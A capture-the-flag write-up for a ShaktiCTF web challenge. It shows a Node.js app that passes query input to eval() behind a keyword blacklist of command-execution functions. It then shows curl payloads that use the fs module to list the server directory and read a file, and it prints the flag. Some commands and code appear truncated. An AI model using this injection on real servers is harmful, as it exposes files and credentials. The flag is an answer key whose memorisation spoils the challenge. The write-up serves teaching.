Tags: web eval node.js
## Description
>It takes many good deeds to build a good reputation, and only one bad function to lose it. url:
Source: https://ctf.shakticon.com/files/a0fcc3b2e2bd831cb93123757167e6ae/main.js?token=eyJ1c2VyX2lkIjo4MDIsInRlYW1faWQiOjI4MSwiZmlsZV9pZCI6NDN9.YGlnjw.MK0LzBnHiKdfRIo4S0RVENkIefY
Author: Gopika
## Solution
The app source code is super short:
var express = require('express');
var app = express();
app.get('/', function (req, res) {
var inp = req.query.text;
const blacklist = ['system', 'child_process', 'exec', 'spawn', 'eval'];
if(blacklist.map(v=>inp.includes(v)).filter(v=>v).length !== 0){
res.send("That function is blocked, sorry XD");
res.send('Welcome to the world ' + eval(inp));
res.send("Hey aren't you missing something??");
app.listen(4000, function () {
console.log('app listening on port 4000!');
There's a blacklist and an `eval()` call. We can use the `fs` package to list directories, read files etc.
$ curl "'fs').readdirSync('.').toString()"
Welcome to the world .bash_history,.bash_logout,.bashrc,.cache,.gnupg,.local,.pm2,.profile,.ssh,Dockerfile,hosts,main.js,node_modules,package-lock.json
I looked around for a flag file but couldn't find one. Turns out the flag was actually stored in the `hosts` file inside the app's current directory (`/app`) for some reason.
$ curl "'fs').readFileSync('hosts').toString()"
Welcome to the world localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters 07e38cb70e8f
# so you found out even if I hid it in not-so common places. one stupid function and it made all my secrets public. shaktictf{eval_1s_n0t_safe_f0r_reputation}
Flag is `shaktictf{eval_1s_n0t_safe_f0r_reputation}`